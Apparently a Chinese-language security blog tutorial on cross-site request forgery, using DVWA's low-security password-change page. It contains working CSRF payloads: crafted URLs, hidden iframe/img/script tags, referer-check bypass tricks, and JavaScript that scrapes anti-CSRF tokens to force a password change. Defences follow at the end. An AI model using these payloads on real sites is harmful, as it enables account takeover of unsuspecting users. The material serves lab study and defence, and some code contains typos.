![\"image-20210315111356224\"](\"http:\/\/img.danielw.top\/image-20210315111356224.png\")
<\/p>\n\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\uff08Cross-Site Request Forgery, CSRF\uff09\u662f\u4e00\u79cd\u631f\u6301\u7528\u6237\u5728\u5df2\u7ecf\u8ba4\u8bc1\u8fc7\u7684Web\u5e94\u7528\u7a0b\u5e8f\u4e0a\u6267\u884c\u975e\u672c\u610f\u7684\u64cd\u4f5c\u7684\u4e00\u79cd\u653b\u51fb\u65b9\u5f0f\u3002\u542c\u8d77\u6765\u548cXSS\uff08\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff09\u76f8\u4f3c\uff0c\u4f46\u662f\u4e24\u8005\u5b9e\u9645\u4e0a\u539f\u7406\u662f\u4e0d\u540c\u7684\uff0cXSS\u662f\u5229\u7528\u7ad9\u70b9\u5185\u7684\u4fe1\u4efb\u7528\u6237\uff0c\u800cCSRF\u662f\u901a\u8fc7\u4f2a\u88c5\u6765\u81ea\u53d7\u4fe1\u7528\u6237\u7684\u8bf7\u6c42\u6765\u5229\u7528\u53d7\u4fe1\u4efb\u7684\u7f51\u7ad9\uff1b\u4e24\u8005\u4e00\u4e2a\u663e\u8457\u7684\u533a\u522b\u5728\u4e8eXSS\u662f\u80fd\u591f\u83b7\u53d6\u7528\u6237cookie\u7b49\u8eab\u4efd\u4fe1\u606f\u6765\u5192\u5145\u7528\u6237\uff0c\u800cCSRF\u5e76\u6ca1\u6709\u83b7\u53d6\u5230\u7528\u6237\u7684\u8eab\u4efd\u4fe1\u606f\u3002<\/p>\n
\u7531\u4e8e\u7528\u6237\u5728\u76ee\u6807\u7f51\u7ad9\u7ecf\u8fc7\u767b\u9646\u8ba4\u8bc1\u5e76\u62ff\u5230\u786e\u8ba4\u540e\u7684\u51ed\u8bc1\uff08\u5982cookie\uff09\uff0c\u5982\u679c\u670d\u52a1\u5668\u53ea\u662f\u7b80\u5355\u6839\u636e\u51ed\u8bc1\u5c31\u901a\u8fc7\u4e86\u7528\u6237\u8ba4\u8bc1\uff0c\u90a3\u4e48\u653b\u51fb\u8005\u901a\u8fc7\u5404\u79cd\u624b\u6bb5\u8bf1\u9a97\u5df2\u7ecf\u8ba4\u8bc1\u767b\u9646\u8fc7\u7f51\u7ad9\u7684\u7528\u6237\u53bb\u8bf7\u6c42\u53d1\u8d77\u4e00\u4e9b\u64cd\u4f5c\uff08\u5982\u53d1\u90ae\u4ef6\uff0c\u53d1\u6d88\u606f\uff0c\u751a\u81f3\u4fee\u6539\u5bc6\u7801\u548c\u8f6c\u79fb\u8d22\u4ea7\u7b49\uff09\uff0c\u7531\u4e8e\u6d4f\u89c8\u5668\u66fe\u7ecf\u8ba4\u8bc1\u8fc7\uff0c\u6240\u4ee5\u88ab\u8bbf\u95ee\u7684\u7f51\u7ad9\u4f1a\u8ba4\u4e3a\u662f\u771f\u6b63\u7684\u7528\u6237\u64cd\u4f5c\u800c\u53bb\u6267\u884c\u3002<\/p>\n
<\/p>\n
\u8fd9\u91cc\u4ee5DVWA\u4e2d\u7684low\u7ea7\u522b\u7684CSRF\u6f0f\u6d1e\u4e3e\u4f8b\uff0c\u8fd9\u91cc\u662f\u4e00\u4e2a\u4fee\u6539\u7528\u6237\u5bc6\u7801\u7684\u754c\u9762\uff0c\u5f53\u7528\u6237\u63d0\u4ea4\u4fee\u6539\u5bc6\u7801\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u9875\u9762\u901a\u8fc7GET\u65b9\u6cd5\u628a\u503c\u4f20\u8f93\u5230\u670d\u52a1\u5668\u8fdb\u884c\u64cd\u4f5c\u3002<\/p>\n
![\"image-20210315103612954\"](\"http:\/\/img.danielw.top\/image-20210315103612954.png\")
<\/p>\n
http:\/\/192.168.91.134\/DVWA\/vulnerabilities\/csrf\/?password_new=password&password_conf=password&Change=Change#<\/code><\/pre>\n\u5229\u7528\u65b9\u6cd5<\/h4>\n\n- \u76f4\u63a5\u6784\u9020URL<\/li>\n<\/ul>\n
\u653b\u51fb\u8005\u901a\u8fc7\u6784\u9020\u5982\u4e0b\u7684URL\uff0c\u8bf1\u9a97\u7528\u6237\u8bbf\u95ee\uff0c\u90a3\u4e48\u7528\u6237\u7684\u5bc6\u7801\u5c31\u4f1a\u88ab\u4fee\u6539\u4e3ahacked<\/code><\/p>\nhttp:\/\/192.168.91.134\/DVWA\/vulnerabilities\/csrf\/?password_new=hacked&password_conf=hacked&Change=Change#<\/code><\/pre>\n\n- \u4f7f\u7528\u77ed\u94fe\u63a5<\/li>\n<\/ul>\n
\u7531\u4e8e\u76f4\u63a5\u6784\u9020URL\u628a\u653b\u51fb\u7684\u610f\u56fe\u66b4\u9732\u7ed9\u7528\u6237\uff0c\u5f88\u5927\u53ef\u80fd\u4f1a\u88ab\u5bdf\u89c9\uff0c\u56e0\u6b64\u53ef\u4ee5\u4f7f\u7528\u77ed\u7f51\u5740\u6765\u6b3a\u9a97\u7528\u6237\u3002\u7528\u6237\u901a\u8fc7\u70b9\u51fb\u77ed\u7f51\u5740\uff0c\u77ed\u7f51\u5740\u4f1a\u91cd\u5b9a\u5411\u5230\u6211\u4eec\u653b\u51fb\u7684URL\u4e2d\uff0c\u4ece\u800c\u5b9e\u73b0\u653b\u51fb<\/p>\n
![\"image-20210223212435977\"](\"http:\/\/img.danielw.top\/image-20210223212435977.png\")
<\/p>\n
\n- \u914d\u5408\u7279\u6b8a\u6807\u7b7e<\/li>\n<\/ul>\n
\u4e0a\u8ff0\u4e24\u79cd\u65b9\u6cd5\u90fd\u4f1a\u5728\u6210\u529f\u4e4b\u540e\u663e\u793a\u5bc6\u7801\u6210\u529f\u4fee\u6539\u7684\u9875\u9762\uff0c\u7528\u6237\u4e00\u4e0b\u5c31\u80fd\u53d1\u73b0\u81ea\u5df1\u53d7\u5230\u4e86\u653b\u51fb\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6807\u7b7e\u6765\u4f7f\u7528\u6237\u96be\u4ee5\u5bdf\u89c9\u3002<\/p>\n
#\u914d\u5408XSS\u653b\u51fb\n<script src="http:\/\/127.0.0.1\/vulnerabilities\/csrf\/?password_new=111&password_conf=111&Change=Change#"><\/script>\n#iframe\u6807\u7b7e\uff0c\u6dfb\u52a0\u6837\u5f0f style="display:none;"\n<iframe src="http:\/\/127.0.0.1\/vulnerabilities\/csrf\/?password_new=111&password_conf=111&Change=Change#" style="display:none;"><\/iframe>\n#img\u6807\u7b7e\u540c\u7406\uff0c\u6dfb\u52a0\u6837\u5f0f border="0" style="display:none;"\n<img src="http:\/\/127.0.0.1\/vulnerabilities\/csrf\/?password_new=111&password_conf=111&Change=Change#"\nborder="0" style="display:none;"><\/code><\/pre>\n\u901a\u8fc7\u5728\u653b\u51fb\u8005\u7684\u670d\u52a1\u5668\u4e2d\u6784\u9020\u4ee5\u4e0a\u7684\u9875\u9762\uff0c\u8bf1\u9a97\u7528\u6237\u8bbf\u95ee\u9875\u9762\uff0c\u4ece\u800c\u5b9e\u73b0\u7528\u6237\u5728\u65e0\u6cd5\u5bdf\u89c9\u7684\u60c5\u51b5\u4e0b\u8fdb\u884c\u4e86CSRF\u653b\u51fb\uff0c\u4f46\u662f\u8fd9\u4e2a\u65b9\u6cd5\u5728EDGE\u6d4f\u89c8\u5668\u65e0\u6cd5\u6210\u529f\uff0c\u56e0\u4e3a\u6d4f\u89c8\u5668\u9650\u5236\u4e86\u4e0d\u540c\u6e90\u7f51\u7ad9cookie\u7684\u4f20\u9012\uff0c\u800cIE\u5219\u6ca1\u6709\u8fd9\u4e2a\u95ee\u9898\u3002<\/p>\n
POST<\/h3>\n
\u7531\u4e8ePOST\u65b9\u6cd5\u6240\u63d0\u4ea4\u7684\u6570\u636e\u4e0d\u662f\u5305\u542b\u5728URL\u4e2d\u7684\uff0c\u6240\u4ee5\u65e0\u6cd5\u76f4\u63a5\u6784\u9020URL\u8ba9\u7528\u6237\u8bbf\u95ee\u6765\u8fdb\u884c\u653b\u51fb\uff0c\u53ea\u80fd\u5728\u653b\u51fb\u8005\u7684\u670d\u52a1\u5668\u4e0a\u6784\u9020\u8868\u5355\u4f7f\u7528POST\u65b9\u6cd5\u63d0\u4ea4\u653b\u51fb\u8005\u60f3\u8981\u7684\u6570\u636e\u7684\u9875\u9762\uff0c\u518d\u8ba9\u7528\u6237\u8bbf\u95ee\u8be5\u9875\u9762\u3002<\/p>\n
example\uff1a<\/p>\n
<form action="http:\/\/127.0.0.1\/vulenrabilities\/csrf\/" id="csrf" method="get">\n <input type="hidden" name="password_new" value="111">\n <input type="hidden" name="password_conf" value="111">\n <input type="hidden" name="Change" value="Change">\n<\/form><\/code><\/pre>\n\u5e38\u89c1\u7684\u9632\u5fa1\u548c\u7ed5\u8fc7\u65b9\u5f0f<\/h2>\nReferer<\/h3>\n
referer\u662f\u5f15\u5bfc\u7528\u6237\u4ee3\u7406\u5230\u5f53\u524d\u9875\u7684\u524d\u4e00\u9875\u7684\u5730\u5740\uff08\u5982\u679c\u5b58\u5728\uff09\u3002\u7531 user agent \u8bbe\u7f6e\u51b3\u5b9a\u3002\u5e76\u4e0d\u662f\u6240\u6709\u7684\u7528\u6237\u4ee3\u7406\u90fd\u4f1a\u8bbe\u7f6e\u8be5\u9879\uff0c\u6709\u7684\u8fd8\u63d0\u4f9b\u4e86\u4fee\u6539 HTTP_REFERER \u7684\u529f\u80fd\u3002\u7b80\u8a00\u4e4b\uff0c\u8be5\u503c\u5e76\u4e0d\u53ef\u4fe1\u3002<\/p>\n
\u7ed5\u8fc7\u65b9\u6cd5<\/h4>\n
example\uff1a\u670d\u52a1\u5668\u8981\u6c42referer\u53c2\u6570\u5305\u542b\u6709\u4e3b\u673a\u540d\u624d\u80fd\u591f\u4fee\u6539\u5bc6\u7801\uff0c\u4e5f\u5c31\u662f\u8bf4\u4e4b\u524d\u6240\u4f7f\u7528\u7684\u8de8\u7ad9\u8bf7\u6c42\u7684\u65b9\u6cd5\u7531\u4e8e\u4ed6\u662f\u7531\u5176\u4ed6\u5730\u5740\u8df3\u8f6c\u5230\u4fee\u6539\u5bc6\u7801\u7684\u5730\u5740\uff0c\u56e0\u6b64\u65e0\u6cd5\u4fee\u6539\u5bc6\u7801\u3002\uff08\u5047\u8bbe\u88ab\u653b\u51fb\u7684\u4e3b\u673a\u7684IP\u4e3a127.0.0.1\uff09<\/p>\n
\n- \u76ee\u5f55\u6df7\u6dc6 referer<\/li>\n<\/ul>\n
\u521b\u5efa\u4e00\u4e2a\u540d\u5b57\u4e3a127.0.0.1\u7684\u6587\u4ef6\u5939\uff0c\u5c06html\u9875\u9762\u653e\u5230\u8be5\u6587\u4ef6\u5939\u4e0b\uff0c\u6b64\u65f6\u6784\u9020\u597d\u7684URL\u4e3a<\/p>\n
http:\/\/xxxx\/127.0.0.1\/CSRF.html<\/code><\/pre>\n\n- \u6587\u4ef6\u540d\u6df7\u6dc6 referer<\/li>\n<\/ul>\n
\u5c06\u6587\u4ef6\u540d\u5b57\u6539\u4e3a127.0.0.1.html\uff0c\u6b64\u65f6\u6784\u9020\u597d\u7684URL\u4e3a<\/p>\n
http:\/\/xxxx\/127.0.0.1.html<\/code><\/pre>\n\n- \uff1f\u62fc\u63a5\u6df7\u6dc6 referer<\/li>\n<\/ul>\n
\u56e0\u4e3a ? \u540e\u9ed8\u8ba4\u5f53\u505a\u53c2\u6570\u4f20\u9012\uff0c\u8fd9\u91cc\u56e0\u4e3a html \u9875\u9762\u662f\u4e0d\u80fd\u63a5\u53d7\u53c2\u6570\u7684\uff0c\u6240\u4ee5\u968f\u4fbf\u8f93\u5165\u662f\u4e0d\u5f71\u54cd\u5b9e\u9645\u7684\u7ed3\u679c\u7684\uff0c\u5229\u7528\u8fd9\u4e2a\u7279\u70b9\u6765\u7ed5\u8fc7 referer \u7684\u68c0\u6d4b\uff0c\u6b64\u65f6\u6784\u9020\u597d\u7684URL\u4e3a<\/p>\n
http:\/\/xxxx\/CSRF.html?127.0.0.1<\/code><\/pre>\n\u4ee5\u4e0a\u76843\u79cd\u65b9\u6cd5\u76ee\u7684\u90fd\u662f\u8ba9\u6211\u4eec\u6784\u9020\u7684URL\u5730\u5740\u542b\u6709\u88ab\u653b\u51fb\u4e3b\u673a\u7684IP\uff08\u540d\u5b57\uff09\uff0c\u4f7f\u5f97referer\u542b\u6709\u88ab\u653b\u51fb\u4e3b\u673a\u7684\u540d\u5b57\uff08IP\uff09\u3002<\/p>\n
Token<\/h3>\n
\u670d\u52a1\u5668\u52a0\u5165Anti-CSRF token\u673a\u5236\uff0c\u7528\u6237\u6bcf\u6b21\u8bbf\u95ee\u9875\u9762\u65f6\uff0c\u670d\u52a1\u5668\u4f1a\u8fd4\u56de\u4e00\u4e2a\u968f\u673a\u7684token\uff0c\u5411\u670d\u52a1\u5668\u53d1\u8d77\u8bf7\u6c42\u65f6\uff0c\u9700\u8981\u63d0\u4ea4token\u53c2\u6570\uff0c\u800c\u670d\u52a1\u5668\u5728\u6536\u5230\u8bf7\u6c42\u65f6\uff0c\u4f1a\u4f18\u5148\u68c0\u67e5token\uff0c\u53ea\u6709token\u6b63\u786e\uff0c\u624d\u4f1a\u5904\u7406\u5ba2\u6237\u7aef\u7684\u8bf7\u6c42\u3002<\/p>\n
\u7ed5\u8fc7\u65b9\u6cd5<\/h4>\n\n- JS \u53d1\u8d77 HTTP CSRF \u8bf7\u6c42<\/li>\n<\/ul>\n
\u56e0\u4e3a HTML \u65e0\u6cd5\u8de8\u57df\uff0c\u653b\u51fb\u8005\u5728\u670d\u52a1\u5668\u4e2d\u6784\u5efaJS\u811a\u672c\uff0c\u8bf1\u9a97\u7528\u6237\u8bbf\u95ee\u8be5\u811a\u672c\uff0c\u8be5\u811a\u672c\u4f1a\u5148\u6b63\u5e38\u8bbf\u95ee\u8981\u653b\u51fb\u7684\u9875\u9762\uff0c\u901a\u8fc7\u6b63\u5219\u5339\u914d\u83b7\u53d6\u670d\u52a1\u5668\u53d1\u8fc7\u6765\u7684 token \u503c\uff0c\u7136\u540e\u518d\u5229\u7528\u83b7\u53d6\u5230\u7684 token \u6784\u5efa HTTP \u5934\u90e8 \u6216\u8005 form \u8868\u5355\uff08\u53d6\u51b3\u4e8e\u670d\u52a1\u5668\u63a5\u6536 token \u7684\u65b9\u6cd5\uff09\u6765\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n
exapmle\uff1a<\/p>\n
\/\/\u9996\u5148\u8bbf\u95eecsrf\u9875\u9762\u83b7\u53d6token\nvar tokenUrl = 'http:\/\/127.0.0.1\/vulnerabilities\/csrf\/';\nif (window.XMLHttpRequest){\n xmlhttp = new XMLHttpRequest();\n}else {\n xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")\n}\nvar count = 0;\nxmlhttp.onreadystatechange = function (){\n if(xmlhttp.readyState === 4 && xmlhttp.status === 200){\n \/\/\u4f7f\u7528\u6b63\u5219\u63d0\u53d6 token\n var text = xmlhttp.responseText;\n var regex = \/user_token\\' value\\=\\'(.*?)\\' \\\/\\>\/;\n var match = text.match(regex);\n var token = match[1];\n \/\/\u53d1\u8d77 CSRF \u8bf7\u6c42\u5c06 token \u5e26\u5165\n var new_url = 'http:\/\/127.0.0.1\/vulnerabilities\/csrf\/?user_token='+token+'&password_new=111&password_conf=111&Change=Change#';\n if (count === 0){\n count++;\n xmlhttp.open("GET",new_url,false);\n xmlhttp.send();\n }\n }\n};\nxmlhttp.open("GET",tokenUrl,false);\nxmlhttp.send();<\/code><\/pre>\n\n- HTML \u53d1\u8d77 CSRF \u8bf7\u6c42<\/li>\n<\/ul>\n
\u5047\u8bbe\u653b\u51fb\u8005\u8fd9\u91cc\u53ef\u4ee5\u5c06 HTML \u4fdd\u5b58\u4e0a\u4f20\u5230 CORS \u7684\u8de8\u57df\u767d\u540d\u5355\u4e0b\u7684\u8bdd\uff0c\u90a3\u4e48\u653b\u51fb\u8005\u4e5f\u53ef\u4ee5\u901a\u8fc7\u5728HTML\u9875\u9762\u4e2d\u4f7f\u7528<iframe><\/code>\u5d4c\u5957\u7f51\u9875\u7684\u65b9\u6cd5\u8bbf\u95ee\u8981\u653b\u51fb\u7684\u9875\u9762\uff0c\u7136\u540e\u518d\u4f7f\u7528JS\u811a\u672c\u7684\u65b9\u6cd5\u83b7\u53d6\u5d4c\u5957\u9875\u9762\u4e2d\u7684 token \u518d\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n<!DOCTYPE html>\n<html lang="en">\n<head>\n <meta charset="UTF-8">\n <title>Title<\/title>\n<\/head>\n<body>\n<script>\n function attack(){\n var token = document.getElementById("get_token").contentWindow.document.getElementsByName('user_token')[0].value\n document.getElementsByClassName('user_token')[0].value = token;\n alert(token);\n document.getElementById("csrf").submit();\n }\n<\/script>\n<iframe src="http:\/\/127.0.0.1\/vulenrabilities\/csrf\/" id="get_token" style="display: none"><\/iframe>\n<div onload="attack()">\n <form action="http:\/\/127.0.0.1\/vulenrabilities\/csrf\/" id="csrf" method="get">\n <input type="hidden" name="password_new" value="111">\n <input type="hidden" name="password_conf" value="111">\n <input type="hidden" name="user_token" value="">\n <input type="hidden" name="Change" value="Change">\n <\/form>\n<\/div>\n<\/body>\n<\/html><\/code><\/pre>\n\u8bbe\u7f6eSameSite<\/h3>\n
\u901a\u8fc7\u8bbe\u7f6ecookie\u7684 SameSite \u5c5e\u6027\u6765\u9650\u5236\u7f51\u7ad9cookie\u7684\u4f20\u9012\u3002\u5f53\u8bbe\u7f6e\u4e3a strict \u6a21\u5f0f\u65f6\uff0ccookie\u53ea\u80fd\u5728\u7b2c\u4e00\u65b9\u7f51\u9875\u4e2d\u53d1\u9001\u4f7f\u7528\uff0c\u800c\u4e0d\u4f1a\u53d1\u9001\u7ed9\u7b2c\u4e09\u65b9\u7f51\u7ad9\u3002\u4e5f\u5c31\u662f\u8bf4\u5728\u7b2c\u4e09\u65b9\u7f51\u7ad9\u8bbf\u95ee\u8be5\u7f51\u9875\u65f6\u4f1a\u663e\u793a\u672a\u767b\u9646\u72b6\u6001\u3002<\/p>\n
\u9a8c\u8bc1\u7801\u3001\u4e8c\u6b21\u9a8c\u8bc1\u7b49<\/h3>\n
\u5728\u53d1\u9001\u8bf7\u6c42\u524d\u8981\u8f93\u5165\u670d\u52a1\u7aef\u5224\u65ad\u7684\u9a8c\u8bc1\u7801\uff0c\u6216\u8005\u9700\u8981\u7528\u6237\u8f93\u5165\u653b\u51fb\u8005\u96be\u4ee5\u77e5\u9053\u7684\u4fe1\u606f\uff08\u5982\u679c\u9700\u8981\u5f53\u524d\u7684\u5bc6\u7801\uff09\uff0c\u8fd9\u6837\u80fd\u591f\u5f88\u5927\u7a0b\u5ea6\u4e0a\u9632\u6b62\u4e86CSRF\u653b\u51fb\uff0c\u4f46\u662f\u4e5f\u4f1a\u964d\u4f4e\u7528\u6237\u4f53\u9a8c\u3002<\/p>\n
\n